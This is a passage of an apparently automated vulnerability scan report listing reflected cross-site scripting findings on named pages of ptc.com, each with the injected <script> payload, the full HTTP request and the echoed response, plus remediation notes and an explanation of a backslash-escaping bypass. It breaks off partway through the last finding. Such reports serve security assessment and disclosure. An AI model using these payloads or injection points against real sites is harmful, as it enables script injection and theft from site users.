Set-Cookie: JSESSIONID=D4C407ABF1307567097C16F0673490AD.hqjbsprd02-e; Domain=ptc.com; Path=/
Content-Type: text/html;charset=utf-8
Vary: Accept-Encoding,User-Agent
Content-Length: 44115
Set-Cookie: NSC_xxx-wjq1=ffffffff0f038a5d45525d5f4f58455e445a4a423660;expires=Mon, 03-Oct-2011 20:41:26 GMT;path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><head>
<title>Document Not Found - PTC.com</title>
<meta http-equiv="Con
...[SNIP]...
<input type="hidden" name="MISSING_DOC" value="/appserver389fc"><script>alert(1)</script>c47fd1f535d/search/results.jsp">
...[SNIP]...

1.28. http://www.ptc.com/appserver/search/results.jsp [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ptc.com
Path:	/appserver/search/results.jsp

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload a3018--><script>alert(1)</script>1d5dd36019e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /appservera3018--><script>alert(1)</script>1d5dd36019e/search/results.jsp?q=xss+txt+css+img+help+faq HTTP/1.1
Host: www.ptc.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.ptc.com/solutions/product-lifecycle-management/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache=12.11.148.55.1317672118140583; country=US; tzmsec=-18000000; s_cc=true; s_sq=%5B%5BB%5D%5D; NSC_xxx-wjq1=ffffffff0f038a5d45525d5f4f58455e445a4a423660; s_gpv_page=Solutions%20%3E%20Product%20Lifecycle%20Management%20%28PLM%29

Response

HTTP/1.1 404 Not Found
Date: Mon, 03 Oct 2011 20:06:05 GMT
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Set-Cookie: JSESSIONID=9E5F844BA3ADEA0549C3DCA5EEE7AE2A.hqjbsprd02-e; Domain=ptc.com; Path=/
Content-Type: text/html;charset=utf-8
Vary: Accept-Encoding,User-Agent
Content-Length: 44117
Set-Cookie: NSC_xxx-wjq1=ffffffff0f038a5d45525d5f4f58455e445a4a423660;expires=Mon, 03-Oct-2011 20:41:30 GMT;path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><head>
<title>Document Not Found - PTC.com</title>
<meta http-equiv="Con
...[SNIP]...
<script>alert(1)</script>1d5dd36019e/search/results.jsp-->
...[SNIP]...

1.29. http://www.ptc.com/appserver/search/results.jsp [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ptc.com
Path:	/appserver/search/results.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 96376"><script>alert(1)</script>a17eafe0063 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /appserver/search/results.jsp?q=xss+txt+css+img+help+faq&96376"><script>alert(1)</script>a17eafe0063=1 HTTP/1.1
Host: www.ptc.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.ptc.com/solutions/product-lifecycle-management/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache=12.11.148.55.1317672118140583; country=US; tzmsec=-18000000; s_cc=true; s_sq=%5B%5BB%5D%5D; NSC_xxx-wjq1=ffffffff0f038a5d45525d5f4f58455e445a4a423660; s_gpv_page=Solutions%20%3E%20Product%20Lifecycle%20Management%20%28PLM%29

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 20:06:00 GMT
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Set-Cookie: JSESSIONID=0A3C776D9D4EE8186B38C368A400006A.hqjbsprd02-e; Domain=ptc.com; Path=/
Content-Type: text/html;charset=utf-8
Vary: Accept-Encoding,User-Agent
Content-Length: 31828
Set-Cookie: NSC_xxx-wjq1=ffffffff0f038a5d45525d5f4f58455e445a4a423660;expires=Mon, 03-Oct-2011 20:41:25 GMT;path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Search - PTC.com</
...[SNIP]...
<a href="?&96376"><script>alert(1)</script>a17eafe0063=1">
...[SNIP]...

1.30. http://www.ptc.com/appserver/search/results.jsp [q parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ptc.com
Path:	/appserver/search/results.jsp

Issue detail

The value of the q request parameter is copied into the HTML document as plain text between tags. The payload 6c758<script>alert(1)</script>7bfa5113c66 was submitted in the q parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /appserver/search/results.jsp?q=xss+txt+css+img+help+faq6c758<script>alert(1)</script>7bfa5113c66 HTTP/1.1
Host: www.ptc.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.ptc.com/solutions/product-lifecycle-management/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache=12.11.148.55.1317672118140583; country=US; tzmsec=-18000000; s_cc=true; s_sq=%5B%5BB%5D%5D; NSC_xxx-wjq1=ffffffff0f038a5d45525d5f4f58455e445a4a423660; s_gpv_page=Solutions%20%3E%20Product%20Lifecycle%20Management%20%28PLM%29

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 20:05:22 GMT
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Set-Cookie: JSESSIONID=E1B6FE81D6505535E1D8DEB29FD57C32.hqjbsprd02-e; Domain=ptc.com; Path=/
Content-Type: text/html;charset=utf-8
Vary: Accept-Encoding,User-Agent
Content-Length: 31901
Set-Cookie: NSC_xxx-wjq1=ffffffff0f038a5d45525d5f4f58455e445a4a423660;expires=Mon, 03-Oct-2011 20:40:47 GMT;path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Search - PTC.com</
...[SNIP]...
<span>xss txt css img help faq6c758<script>alert(1)</script>7bfa5113c66</span>
...[SNIP]...

1.31. http://www.ptc.com/appserver/search/results.jsp [q parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ptc.com
Path:	/appserver/search/results.jsp

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6727d\'%3balert(1)//f80b1e7de25 was submitted in the q parameter. This input was echoed as 6727d\\';alert(1)//f80b1e7de25 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /appserver/search/results.jsp?q=xss+txt+css+img+help+faq6727d\'%3balert(1)//f80b1e7de25 HTTP/1.1
Host: www.ptc.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.ptc.com/solutions/product-lifecycle-management/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache=12.11.148.55.1317672118140583; country=US; tzmsec=-18000000; s_cc=true; s_sq=%5B%5BB%5D%5D; NSC_xxx-wjq1=ffffffff0f038a5d45525d5f4f58455e445a4a423660; s_gpv_page=Solutions%20%3E%20Product%20Lifecycle%20Management%20%28PLM%29

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 20:05:19 GMT
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Set-Cookie: JSESSIONID=B7F14ABFFC6AD6DF7C796F49E33418E9.hqjbsprd02-e; Domain=ptc.com; Path=/
Content-Type: text/html;charset=utf-8
Vary: Accept-Encoding,User-Agent
Content-Length: 31866
Set-Cookie: NSC_xxx-wjq1=ffffffff0f038a5d45525d5f4f58455e445a4a423660;expires=Mon, 03-Oct-2011 20:40:45 GMT;path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Search - PTC.com</
...[SNIP]...
<script type="text/javascript">
   try {
       s.prop6='null: xss txt css img help faq6727d\\';alert(1)//f80b1e7de25';
   } catch (err) {}

   FastSearch.more = 'more';
   FastSearch.less = 'less';
   PTCAddLoadEvent(FastSearch.dd);
   PTCAddLoadEvent(FastSearch.trackClickInit);
</script>
...[SNIP]...

1.32. http://www.ptc.com/common/account/index.htm [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ptc.com
Path:	/common/account/index.htm

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 3dc21--><script>alert(1)</script>677d085690c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /common3dc21--><script>alert(1)</script>677d085690c/account/index.htm HTTP/1.1
Host: www.ptc.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache=12.11.148.55.1317672118140583; s_gpv_searchterm=null%3A%20xss%20txt%20css%20img%20help%20faq; s_eVar8=null%3A%20xss%20txt%20css%20img%20help%20faq; NSC_xxx-wjq1=ffffffff0f038a5d45525d5f4f58455e445a4a423660; cookietest=on; country=US; tzmsec=-18000000; s_cc=true; s_gpv_page=Password; s_sq=ptc-global-new%2Cptc-ptccom-new%3D%2526pid%253DPassword%2526pidt%253D1%2526oid%253Dhttps%25253A//www.ptc.com/common/account/index.htm%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Date: Mon, 03 Oct 2011 20:07:26 GMT
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Set-Cookie: JSESSIONID=CC488059AF4EADC77B936E45650CC794.hqjbsprd02-e; Domain=ptc.com; Path=/
Content-Type: text/html;charset=utf-8
Vary: Accept-Encoding,User-Agent
Content-Length: 44508
Set-Cookie: NSC_xxx-wjq1=ffffffff0f038a5d45525d5f4f58455e445a4a423660;expires=Mon, 03-Oct-2011 20:42:51 GMT;path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><head>
<title>Document Not Found - PTC.com</title>
<meta http-equiv="Con
...[SNIP]...
<script>alert(1)</script>677d085690c/account/index.htm-->
...[SNIP]...

1.33. http://www.ptc.com/common/account/index.htm [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ptc.com
Path:	/common/account/index.htm

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload 75071--><script>alert(1)</script>128394af0f7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /common/account75071--><script>alert(1)</script>128394af0f7/index.htm HTTP/1.1
Host: www.ptc.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache=12.11.148.55.1317672118140583; s_gpv_searchterm=null%3A%20xss%20txt%20css%20img%20help%20faq; s_eVar8=null%3A%20xss%20txt%20css%20img%20help%20faq; NSC_xxx-wjq1=ffffffff0f038a5d45525d5f4f58455e445a4a423660; cookietest=on; country=US; tzmsec=-18000000; s_cc=true; s_gpv_page=Password; s_sq=ptc-global-new%2Cptc-ptccom-new%3D%2526pid%253DPassword%2526pidt%253D1%2526oid%253Dhttps%25253A//www.ptc.com/common/account/index.htm%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Date: Mon, 03 Oct 2011 20:07:30 GMT
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Set-Cookie: JSESSIONID=F4255A4BC4E4A08F5711BF2A61733B9E.hqjbsprd02-e; Domain=ptc.com; Path=/
Content-Type: text/html;charset=utf-8
Vary: Accept-Encoding,User-Agent
Content-Length: 44508
Set-Cookie: NSC_xxx-wjq1=ffffffff0f038a5d45525d5f4f58455e445a4a423660;expires=Mon, 03-Oct-2011 20:42:55 GMT;path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><head>
<title>Document Not Found - PTC.com</title>
<meta http-equiv="Con
...[SNIP]...
<script>alert(1)</script>128394af0f7/index.htm-->
...[SNIP]...

1.34. http://www.ptc.com/common/account/index.htm [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ptc.com
Path:	/common/account/index.htm

Issue detail

The value of REST URL parameter 3 is copied into an HTML comment. The payload 39e9c--><script>alert(1)</script>ec479487b15 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /common/account/index.htm39e9c--><script>alert(1)</script>ec479487b15 HTTP/1.1
Host: www.ptc.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache=12.11.148.55.1317672118140583; s_gpv_searchterm=null%3A%20xss%20txt%20css%20img%20help%20faq; s_eVar8=null%3A%20xss%20txt%20css%20img%20help%20faq; NSC_xxx-wjq1=ffffffff0f038a5d45525d5f4f58455e445a4a423660; cookietest=on; country=US; tzmsec=-18000000; s_cc=true; s_gpv_page=Password; s_sq=ptc-global-new%2Cptc-ptccom-new%3D%2526pid%253DPassword%2526pidt%253D1%2526oid%253Dhttps%25253A//www.ptc.com/common/account/index.htm%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Date: Mon, 03 Oct 2011 20:07:33 GMT
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Set-Cookie: JSESSIONID=2F9EE191836985A4CF788A4A8BAF062B.hqjbsprd02-e; Domain=ptc.com; Path=/
Content-Type: text/html;charset=utf-8
Vary: Accept-Encoding,User-Agent
Content-Length: 44508
Set-Cookie: NSC_xxx-wjq1=ffffffff0f038a5d45525d5f4f58455e445a4a423660;expires=Mon, 03-Oct-2011 20:42:59 GMT;path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><head>
<title>Document Not Found - PTC.com</title>
<meta http-equiv="Con
...[SNIP]...
<script>alert(1)</script>ec479487b15-->
...[SNIP]...

1.35. http://www.ptc.com/favicon.ico [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ptc.com
Path:	/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 4ccd3--><script>alert(1)</script>3b10ecc7201 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /favicon.ico4ccd3--><script>alert(1)</script>3b10ecc7201 HTTP/1.1
Host: www.ptc.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache=12.11.148.55.1317672118140583; country=US; tzmsec=-18000000; s_cc=true; s_gpv_page=Products%20%3E%20Mathcad%20Product%20Page; s_sq=%5B%5BB%5D%5D; NSC_xxx-wjq1=ffffffff0f038a5d45525d5f4f58455e445a4a423660

Response

HTTP/1.1 404 Not Found
Date: Mon, 03 Oct 2011 20:02:36 GMT
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Content-Type: text/html;charset=utf-8
Vary: Accept-Encoding,User-Agent
Content-Length: 43362
Set-Cookie: NSC_xxx-wjq1=ffffffff0f038a5d45525d5f4f58455e445a4a423660;expires=Mon, 03-Oct-2011 20:38:01 GMT;path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><head>
<title>Document Not Found - PTC.com</title>
<meta http-equiv="Con
...[SNIP]...
<script>alert(1)</script>3b10ecc7201-->
...[SNIP]...

1.36. http://www.ptc.com/products/mathcad/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ptc.com
Path:	/products/mathcad/

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 2b78c--><script>alert(1)</script>5521b9cc017 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /products2b78c--><script>alert(1)</script>5521b9cc017/mathcad/ HTTP/1.1
Host: www.ptc.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.google.com/search?gcx=w&sourceid=chrome&ie=UTF-8&q=control+systems#pq=control+systems&hl=en&cp=5&gs_id=j&xhr=t&q=mathcad&qe=bWF0aGM&qesig=9TbiipYEAZC7WKi55YxjrA&pkc=AFgZ2tmlRroTZvj-GFJ1NJj2q1NtSwFvzq-YtVc3ZLoxwmQ5jKvDaOxkolP84m3mPcjigrxMpDIDTrPXBn6AXtc6rAwuw7c2Bg&pf=p&sclient=psy-ab&source=hp&pbx=1&oq=mathc&aq=0&aqi=g3g-s1&aql=&gs_sm=&gs_upl=&fp=1&biw=1630&bih=1004&bav=on.2,or.r_gc.r_pw.,cf.osb&cad=b
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 03 Oct 2011 20:02:16 GMT
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Content-Type: text/html;charset=utf-8
Vary: Accept-Encoding,User-Agent
Content-Length: 43363
Set-Cookie: NSC_xxx-wjq1=ffffffff0f038a5d45525d5f4f58455e445a4a423660;expires=Mon, 03-Oct-2011 20:37:41 GMT;path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><head>
<title>Document Not Found - PTC.com</title>
<meta http-equiv="Con
...[SNIP]...
<script>alert(1)</script>5521b9cc017/mathcad-->
...[SNIP]...

1.37. http://www.ptc.com/products/mathcad/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ptc.com
Path:	/products/mathcad/

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload 3fdb1--><script>alert(1)</script>63b70b3bc0f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /products/mathcad3fdb1--><script>alert(1)</script>63b70b3bc0f/ HTTP/1.1
Host: www.ptc.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.google.com/search?gcx=w&sourceid=chrome&ie=UTF-8&q=control+systems#pq=control+systems&hl=en&cp=5&gs_id=j&xhr=t&q=mathcad&qe=bWF0aGM&qesig=9TbiipYEAZC7WKi55YxjrA&pkc=AFgZ2tmlRroTZvj-GFJ1NJj2q1NtSwFvzq-YtVc3ZLoxwmQ5jKvDaOxkolP84m3mPcjigrxMpDIDTrPXBn6AXtc6rAwuw7c2Bg&pf=p&sclient=psy-ab&source=hp&pbx=1&oq=mathc&aq=0&aqi=g3g-s1&aql=&gs_sm=&gs_upl=&fp=1&biw=1630&bih=1004&bav=on.2,or.r_gc.r_pw.,cf.osb&cad=b
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 03 Oct 2011 20:02:20 GMT
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Set-Cookie: JSESSIONID=169780382FBCEA1F19D573E344917ECC.hqjbsprd02-e; Domain=ptc.com; Path=/
Content-Type: text/html;charset=utf-8
Vary: Accept-Encoding,User-Agent
Content-Length: 43363
Set-Cookie: NSC_xxx-wjq1=ffffffff0f038a5d45525d5f4f58455e445a4a423660;expires=Mon, 03-Oct-2011 20:37:45 GMT;path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><head>
<title>Document Not Found - PTC.com</title>
<meta http-equiv="Con
...[SNIP]...
<script>alert(1)</script>63b70b3bc0f-->
...[SNIP]...

1.38. http://www.ptc.com/services/index.htm [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ptc.com
Path:	/services/index.htm

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload f4950--><script>alert(1)</script>de5d021ac34 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /servicesf4950--><script>alert(1)</script>de5d021ac34/index.htm HTTP/1.1
Host: www.ptc.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.ptc.com/products/mathcad/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache=12.11.148.55.1317672118140583; country=US; tzmsec=-18000000; s_cc=true; NSC_xxx-wjq1=ffffffff0f038a5d45525d5f4f58455e445a4a423660; s_gpv_page=Products%20%3E%20Mathcad%20Product%20Page; s_sq=ptc-global-new%2Cptc-ptccom-new%3D%2526pid%253DProducts%252520%25253E%252520Mathcad%252520Product%252520Page%2526pidt%253D1%2526oid%253Dhttp%25253A//www.ptc.com/services/index.htm%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Date: Mon, 03 Oct 2011 20:05:11 GMT
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Content-Type: text/html;charset=utf-8
Vary: Accept-Encoding,User-Agent
Content-Length: 45186
Set-Cookie: NSC_xxx-wjq1=ffffffff0f038a5d45525d5f4f58455e445a4a423660;expires=Mon, 03-Oct-2011 20:40:36 GMT;path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><head>
<title>Document Not Found - PTC.com</title>
<meta http-equiv="Con
...[SNIP]...
<script>alert(1)</script>de5d021ac34/index.htm-->
...[SNIP]...

1.39. http://www.ptc.com/services/index.htm [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ptc.com
Path:	/services/index.htm

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d60c2"><script>alert(1)</script>4436d76ce00 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /servicesd60c2"><script>alert(1)</script>4436d76ce00/index.htm HTTP/1.1
Host: www.ptc.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.ptc.com/products/mathcad/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache=12.11.148.55.1317672118140583; country=US; tzmsec=-18000000; s_cc=true; NSC_xxx-wjq1=ffffffff0f038a5d45525d5f4f58455e445a4a423660; s_gpv_page=Products%20%3E%20Mathcad%20Product%20Page; s_sq=ptc-global-new%2Cptc-ptccom-new%3D%2526pid%253DProducts%252520%25253E%252520Mathcad%252520Product%252520Page%2526pidt%253D1%2526oid%253Dhttp%25253A//www.ptc.com/services/index.htm%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Date: Mon, 03 Oct 2011 20:05:07 GMT
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Content-Type: text/html;charset=utf-8
Vary: Accept-Encoding,User-Agent
Content-Length: 45184
Set-Cookie: NSC_xxx-wjq1=ffffffff0f038a5d45525d5f4f58455e445a4a423660;expires=Mon, 03-Oct-2011 20:40:32 GMT;path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><head>
